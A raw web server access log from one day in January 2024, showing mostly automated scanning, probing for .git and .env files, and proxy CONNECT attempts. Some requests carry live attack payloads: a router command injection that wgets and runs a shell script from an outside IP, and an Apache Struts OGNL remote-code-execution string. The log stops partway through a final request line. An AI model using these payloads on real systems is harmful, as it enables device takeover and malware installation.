178.79.139.171 - - [09/Jan/2024:00:38:16 +0100] "GET / HTTP/1.0" 200 1895 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "POST /sdk HTTP/1.1" 404 721 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /.git/HEAD HTTP/1.1" 404 731 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /admin.jsp HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /CSS/Miniweb.css HTTP/1.1" 404 737 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /server-status HTTP/1.1" 404 731 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "POST /scripts/WPnBr.dll HTTP/1.1" 404 739 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET / HTTP/1.0" 200 1895 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "HEAD / HTTP/1.0" 200 - 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /localstart.jhtml HTTP/1.1" 404 734 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 1895 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "CONNECT www.google.com:80 HTTP/1.0" 400 804 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /start.php HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 1895 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /Portal/Portal.mwsl HTTP/1.1" 404 740 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "-" 400 1930 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET / HTTP/1.0" 200 1895 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /home.jsa HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /docs/cplugError.html/ HTTP/1.1" 404 747 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET / HTTP/1.0" 200 1895 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /Portal0000.htm HTTP/1.1" 404 732 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /base.php HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "HEAD / HTTP/1.0" 200 - 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /nmaplowercheck1704757103 HTTP/1.1" 404 742 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /__Additional HTTP/1.1" 404 730 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET / HTTP/1.1" 200 1895 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /GraB HTTP/1.1" 404 722 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "CONNECT www.wikipedia.org:80 HTTP/1.0" 400 804 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /HNAP1 HTTP/1.1" 404 723 178.79.139.171 - - [09/Jan/2024:00:38:23 +0100] "GET /default.jsa HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "GET /pools/default/buckets HTTP/1.1" 404 747 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "GET / HTTP/1.0" 200 1895 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "GET /robots.txt HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "-" 400 1930 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "GET /pools HTTP/1.1" 404 723 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "CONNECT www.computerhistory.org:80 HTTP/1.0" 400 804 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "GET / HTTP/1.1" 200 1895 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "GET /admin.jhtml HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "GET /indice.jsp HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "HEAD / HTTP/1.1" 200 - 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "GET /admin.shtml HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "GET / HTTP/1.1" 200 1895 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "GET /base.asp HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "GET /favicon.ico HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:24 +0100] "GET /menu.shtml HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:25 +0100] "GET /admin.cgi HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:25 +0100] "GET /main.jhtml HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:25 +0100] "GET /main.pl HTTP/1.1" 404 725 178.79.139.171 - - [09/Jan/2024:00:38:25 +0100] "GET /admin.php HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:25 +0100] "GET /menu.asp HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:25 +0100] "GET /inicio.jsp HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:25 +0100] "GET /start.aspx HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:26 +0100] "GET /start.shtml HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:26 +0100] "GET /admin.jsa HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:26 +0100] "GET /base.jhtml HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:26 +0100] "GET /readme.txt HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:26 +0100] "GET /admin.html HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:26 +0100] "GET /menu.jsp HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:27 +0100] "GET /start.pl HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:27 +0100] "GET /home.shtml HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:27 +0100] "GET /index.html HTTP/1.1" 200 1895 178.79.139.171 - - [09/Jan/2024:00:38:27 +0100] "GET /home.pl HTTP/1.1" 404 725 178.79.139.171 - - [09/Jan/2024:00:38:27 +0100] "GET /main.cgi HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:27 +0100] "GET /main.jsp HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:27 +0100] "GET /menu.pl HTTP/1.1" 404 725 178.79.139.171 - - [09/Jan/2024:00:38:28 +0100] "GET /localstart.jsp HTTP/1.1" 404 732 178.79.139.171 - - [09/Jan/2024:00:38:28 +0100] "GET /admin.cfm HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:28 +0100] "GET /index.asp HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:28 +0100] "GET /localstart.pl HTTP/1.1" 404 731 178.79.139.171 - - [09/Jan/2024:00:38:28 +0100] "GET /base.shtml HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:28 +0100] "GET /home.jhtml HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:29 +0100] "GET /admin.asp HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:29 +0100] "GET /base.pl HTTP/1.1" 404 725 178.79.139.171 - - [09/Jan/2024:00:38:29 +0100] "GET /base.aspx HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:29 +0100] "GET /start.jsa HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:29 +0100] "GET /menu.aspx HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:29 +0100] "GET /base.jsp HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:30 +0100] "GET /base.jsa HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:30 +0100] "GET /base.inc HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:30 +0100] "GET /menu.php HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:30 +0100] "GET default.asp HTTP/1.1" 400 804 178.79.139.171 - - [09/Jan/2024:00:38:30 +0100] "GET /index.aspx HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:30 +0100] "GET /base.cgi HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:30 +0100] "GET /base.cfm HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:31 +0100] "GET /home.html HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:31 +0100] "GET /indice.shtml HTTP/1.1" 404 730 178.79.139.171 - - [09/Jan/2024:00:38:31 +0100] "GET /start.cgi HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:31 +0100] "GET /indice.asp HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:31 +0100] "GET /menu.jsa HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:31 +0100] "GET /indice.php HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:31 +0100] "GET /indice.jsa HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:32 +0100] "GET /default.aspx HTTP/1.1" 404 730 178.79.139.171 - - [09/Jan/2024:00:38:32 +0100] "GET /main.html HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:32 +0100] "GET /index.php HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:32 +0100] "GET /main.jsa HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:32 +0100] "GET /menu.html HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:32 +0100] "GET /indice.cgi HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:33 +0100] "GET /indice.cfm HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:33 +0100] "GET /indice.aspx HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:33 +0100] "GET /menu.cfm HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:33 +0100] "GET /inicio.pl HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:33 +0100] "GET /home.asp HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:33 +0100] "GET /home.cgi HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:33 +0100] "GET /default.pl HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:33 +0100] "-" 400 1930 178.79.139.171 - - [09/Jan/2024:00:38:34 +0100] "GET /inicio.asp HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:34 +0100] "GET /inicio.html HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:34 +0100] "GET /localstart.php HTTP/1.1" 404 732 178.79.139.171 - - [09/Jan/2024:00:38:34 +0100] "GET /index.shtml HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:34 +0100] "GET /inicio.shtml HTTP/1.1" 404 730 178.79.139.171 - - [09/Jan/2024:00:38:34 +0100] "GET /inicio.php HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:35 +0100] "GET /localstart.cgi HTTP/1.1" 404 732 178.79.139.171 - - [09/Jan/2024:00:38:35 +0100] "GET /default.php HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:35 +0100] "GET /default.html HTTP/1.1" 404 730 178.79.139.171 - - [09/Jan/2024:00:38:35 +0100] "GET /inicio.jsa HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:35 +0100] "GET /start.html HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:35 +0100] "GET /home.aspx HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:35 +0100] "GET /inicio.cgi HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:36 +0100] "GET /home.cfm HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:36 +0100] "GET /localstart.jsa HTTP/1.1" 404 732 178.79.139.171 - - [09/Jan/2024:00:38:36 +0100] "GET /inicio.cfm HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:36 +0100] "GET /localstart.aspx HTTP/1.1" 404 733 178.79.139.171 - - [09/Jan/2024:00:38:36 +0100] "GET /inicio.aspx HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:36 +0100] "GET /index.jhtml HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:37 +0100] "GET /localstart.shtml HTTP/1.1" 404 734 178.79.139.171 - - [09/Jan/2024:00:38:37 +0100] "GET /admin.aspx HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:37 +0100] "GET /localstart.html HTTP/1.1" 404 733 178.79.139.171 - - [09/Jan/2024:00:38:37 +0100] "GET /main.aspx HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:37 +0100] "GET /default.jhtml HTTP/1.1" 404 731 178.79.139.171 - - [09/Jan/2024:00:38:37 +0100] "GET /menu.cgi HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:37 +0100] "GET /admin.pl HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:38 +0100] "GET /localstart.asp HTTP/1.1" 404 732 178.79.139.171 - - [09/Jan/2024:00:38:38 +0100] "GET /home.php HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:38 +0100] "GET /default.shtml HTTP/1.1" 404 731 178.79.139.171 - - [09/Jan/2024:00:38:38 +0100] "GET /index.cfm HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:38 +0100] "GET /default.asp HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:38 +0100] "GET /indice.html HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:39 +0100] "GET /start.jhtml HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:39 +0100] "GET /main.asp HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:39 +0100] "GET /start.jsp HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:39 +0100] "GET /localstart.cfm HTTP/1.1" 404 732 178.79.139.171 - - [09/Jan/2024:00:38:39 +0100] "GET /indice.pl HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:39 +0100] "GET /start.asp HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:39 +0100] "GET /default.cgi HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:40 +0100] "GET /home.jsp HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:40 +0100] "GET /inicio.jhtml HTTP/1.1" 404 730 178.79.139.171 - - [09/Jan/2024:00:38:40 +0100] "GET /default.cfm HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:40 +0100] "GET /start.cfm HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:40 +0100] "GET /index.jsp HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:40 +0100] "GET /menu.jhtml HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:41 +0100] "GET /base.html HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:41 +0100] "GET /index.cgi HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:41 +0100] "GET /main.shtml HTTP/1.1" 404 728 178.79.139.171 - - [09/Jan/2024:00:38:41 +0100] "GET /indice.jhtml HTTP/1.1" 404 730 178.79.139.171 - - [09/Jan/2024:00:38:41 +0100] "GET /index.jsa HTTP/1.1" 404 727 178.79.139.171 - - [09/Jan/2024:00:38:41 +0100] "GET /main.cfm HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:41 +0100] "GET /main.php HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:42 +0100] "GET /default.jsp HTTP/1.1" 404 729 178.79.139.171 - - [09/Jan/2024:00:38:42 +0100] "GET /index.pl HTTP/1.1" 404 726 178.79.139.171 - - [09/Jan/2024:00:38:42 +0100] "GET / HTTP/1.0" 200 1895 178.79.139.171 - - [09/Jan/2024:00:38:43 +0100] "GET / HTTP/1.1" 200 1895 123.202.181.122 - - [09/Jan/2024:01:09:36 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 172.104.11.51 - - [09/Jan/2024:01:18:36 +0100] "-" 400 1930 45.128.232.152 - - [09/Jan/2024:01:35:31 +0100] "CONNECT google.com:443 HTTP/1.1" 400 804 45.128.232.15 - - [09/Jan/2024:01:38:22 +0100] "CONNECT google.com:443 HTTP/1.1" 400 804 198.235.24.81 - - [09/Jan/2024:02:44:26 +0100] "-" 400 1930 198.235.24.81 - - [09/Jan/2024:02:44:27 +0100] "-" 400 1930 38.222.60.156 - - [09/Jan/2024:02:53:34 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 138.199.34.205 - - [09/Jan/2024:02:58:41 +0100] "CONNECT upload.wikimedia.org:443 HTTP/1.1" 400 804 87.236.176.73 - - [09/Jan/2024:03:16:41 +0100] "GET / HTTP/1.1" 200 1895 205.210.31.205 - - [09/Jan/2024:03:57:35 +0100] "GET / HTTP/1.1" 200 1895 189.146.188.9 - - [09/Jan/2024:04:15:35 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 104.248.130.34 - - [09/Jan/2024:04:26:13 +0100] "GET /aaa9 HTTP/1.1" 404 722 104.248.130.34 - - [09/Jan/2024:04:26:14 +0100] "GET /aab8 HTTP/1.1" 404 722 104.248.130.34 - - [09/Jan/2024:04:26:16 +0100] "GET / HTTP/1.1" 200 1895 128.14.134.134 - - [09/Jan/2024:04:31:58 +0100] "GET / HTTP/1.1" 200 1895 59.9.85.28 - - [09/Jan/2024:04:48:02 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 84.54.51.33 - - [09/Jan/2024:05:00:31 +0100] "CONNECT google.com:443 HTTP/1.1" 400 804 94.156.71.249 - - [09/Jan/2024:06:19:52 +0100] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 94.156.71.249 - - [09/Jan/2024:06:19:52 +0100] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 94.156.71.249 - - [09/Jan/2024:06:19:53 +0100] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 94.156.71.249 - - [09/Jan/2024:06:19:53 +0100] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 94.156.71.249 - - [09/Jan/2024:06:19:54 +0100] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 94.156.71.249 - - [09/Jan/2024:06:19:55 +0100] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 94.156.71.249 - - [09/Jan/2024:06:19:55 +0100] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 94.156.71.249 - - [09/Jan/2024:06:19:56 +0100] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 94.156.71.249 - - [09/Jan/2024:06:19:56 +0100] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 94.156.71.249 - - [09/Jan/2024:06:19:57 +0100] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 78.108.177.51 - - [09/Jan/2024:06:50:53 +0100] "GET / HTTP/1.0" 200 1895 45.95.169.184 - - [09/Jan/2024:07:01:35 +0100] "-" 400 1930 45.95.169.184 - - [09/Jan/2024:07:01:36 +0100] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 754 35.216.178.21 - - [09/Jan/2024:07:14:56 +0100] "-" 400 1930 35.216.178.21 - - [09/Jan/2024:07:14:56 +0100] "GET / HTTP/1.1" 200 1895 35.216.178.21 - - [09/Jan/2024:07:14:56 +0100] "-" 400 1930 35.216.178.21 - - [09/Jan/2024:07:14:56 +0100] "GET / HTTP/1.1" 200 1895 35.216.178.21 - - [09/Jan/2024:07:14:56 +0100] "GET /.git/config HTTP/1.1" 404 733 35.216.178.21 - - [09/Jan/2024:07:14:56 +0100] "GET /server-status HTTP/1.1" 404 731 35.216.178.21 - - [09/Jan/2024:07:14:56 +0100] "GET /config.json HTTP/1.1" 404 729 35.216.178.21 - - [09/Jan/2024:07:14:56 +0100] "GET /.env HTTP/1.1" 404 722 35.216.178.21 - - [09/Jan/2024:07:14:56 +0100] "GET /telescope/requests HTTP/1.1" 404 740 35.216.178.21 - - [09/Jan/2024:07:14:56 +0100] "GET /info.php HTTP/1.1" 404 726 185.224.128.191 - - [09/Jan/2024:07:27:31 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.224.128.191%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B.%2Ftenda.sh) HTTP/1.1" 404 756 185.224.128.191 - - [09/Jan/2024:07:27:31 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F185.224.128.191%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B.%2Ftenda.sh) HTTP/1.1" 404 756 141.98.11.40 - - [09/Jan/2024:07:32:36 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 736 46.174.191.32 - - [09/Jan/2024:07:35:55 +0100] "GET / HTTP/1.0" 200 1895 87.251.75.145 - - [09/Jan/2024:07:47:08 +0100] "-" 400 1930 185.224.128.191 - - [09/Jan/2024:08:26:58 +0100] "GET / HTTP/1.1" 200 1895 35.216.180.88 - - [09/Jan/2024:08:34:40 +0100] "GET / HTTP/1.1" 200 1895 152.32.143.174 - - [09/Jan/2024:08:36:24 +0100] "GET / HTTP/1.1" 200 1895 152.32.143.174 - - [09/Jan/2024:08:36:25 +0100] "-" 400 1930 101.36.123.67 - - [09/Jan/2024:08:36:34 +0100] "GET / HTTP/1.1" 200 1895 101.36.123.67 - - [09/Jan/2024:08:36:35 +0100] "GET /favicon.ico HTTP/1.1" 404 729 101.36.123.67 - - [09/Jan/2024:08:36:35 +0100] "GET /sitemap.xml HTTP/1.1" 404 729 101.36.123.67 - - [09/Jan/2024:08:36:35 +0100] "GET /robots.txt HTTP/1.1" 404 728 101.36.123.67 - - [09/Jan/2024:08:36:35 +0100] "GET /axis2-admin/ HTTP/1.1" 404 734 101.36.123.67 - - [09/Jan/2024:08:36:36 +0100] "GET /axis2/ HTTP/1.1" 404 728 101.36.123.67 - - [09/Jan/2024:08:36:36 +0100] "GET /axis2/axis2-admin/ HTTP/1.1" 404 744 101.36.123.67 - - [09/Jan/2024:08:36:37 +0100] "GET null HTTP/1.1" 400 1994 101.36.123.67 - - [09/Jan/2024:08:36:37 +0100] "GET /struts/webconsole.html HTTP/1.1" 404 744 101.36.123.67 - - [09/Jan/2024:08:36:37 +0100] "GET /?actionErrors=1111 HTTP/1.1" 200 1895 101.36.123.67 - - [09/Jan/2024:08:36:38 +0100] "GET /invoker/readonly HTTP/1.1" 404 738 80.66.76.149 - - [09/Jan/2024:08:55:03 +0100] "-" 400 1930 141.98.11.40 - - [09/Jan/2024:09:23:16 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 736 194.36.177.113 - - [09/Jan/2024:10:18:25 +0100] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 194.36.177.113 - - [09/Jan/2024:10:18:25 +0100] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 194.36.177.113 - - [09/Jan/2024:10:18:26 +0100] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 194.36.177.113 - - [09/Jan/2024:10:18:26 +0100] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 194.36.177.113 - - [09/Jan/2024:10:18:27 +0100] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 194.36.177.113 - - [09/Jan/2024:10:18:28 +0100] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 194.36.177.113 - - [09/Jan/2024:10:18:29 +0100] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 194.36.177.113 - - [09/Jan/2024:10:18:29 +0100] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 194.36.177.113 - - [09/Jan/2024:10:18:29 +0100] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 194.36.177.113 - - [09/Jan/2024:10:18:30 +0100] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 84.54.51.33 - - [09/Jan/2024:10:22:16 +0100] "CONNECT google.com:443 HTTP/1.1" 400 804 143.244.174.80 - - [09/Jan/2024:10:28:35 +0100] "-" 400 1930 143.244.174.80 - - [09/Jan/2024:10:28:35 +0100] "-" 400 1930 143.244.174.80 - - [09/Jan/2024:10:28:35 +0100] "GET / HTTP/1.1" 200 1895 143.244.174.80 - - [09/Jan/2024:10:28:36 +0100] "-" 400 1930 45.128.232.152 - - [09/Jan/2024:11:02:32 +0100] "CONNECT google.com:443 HTTP/1.1" 400 804 193.42.62.221 - - [09/Jan/2024:11:03:14 +0100] "GET / HTTP/1.1" 200 1895 94.156.64.126 - - [09/Jan/2024:11:42:20 +0100] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 94.156.64.126 - - [09/Jan/2024:11:45:44 +0100] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 170.64.212.32 - - [09/Jan/2024:12:39:42 +0100] "-" 400 1930 170.64.212.32 - - [09/Jan/2024:12:39:42 +0100] "-" 400 1930 170.64.212.32 - - [09/Jan/2024:12:39:43 +0100] "GET /157.90.17.105 HTTP/1.1" 400 771 62.233.50.179 - - [09/Jan/2024:13:09:44 +0100] "-" 400 1930 208.87.206.42 - - [09/Jan/2024:13:25:28 +0100] "POST / HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:29 +0100] "POST / HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:29 +0100] "GET /?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:30 +0100] "GET /?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 200 1895 208.87.206.42 - - [09/Jan/2024:13:25:31 +0100] "GET 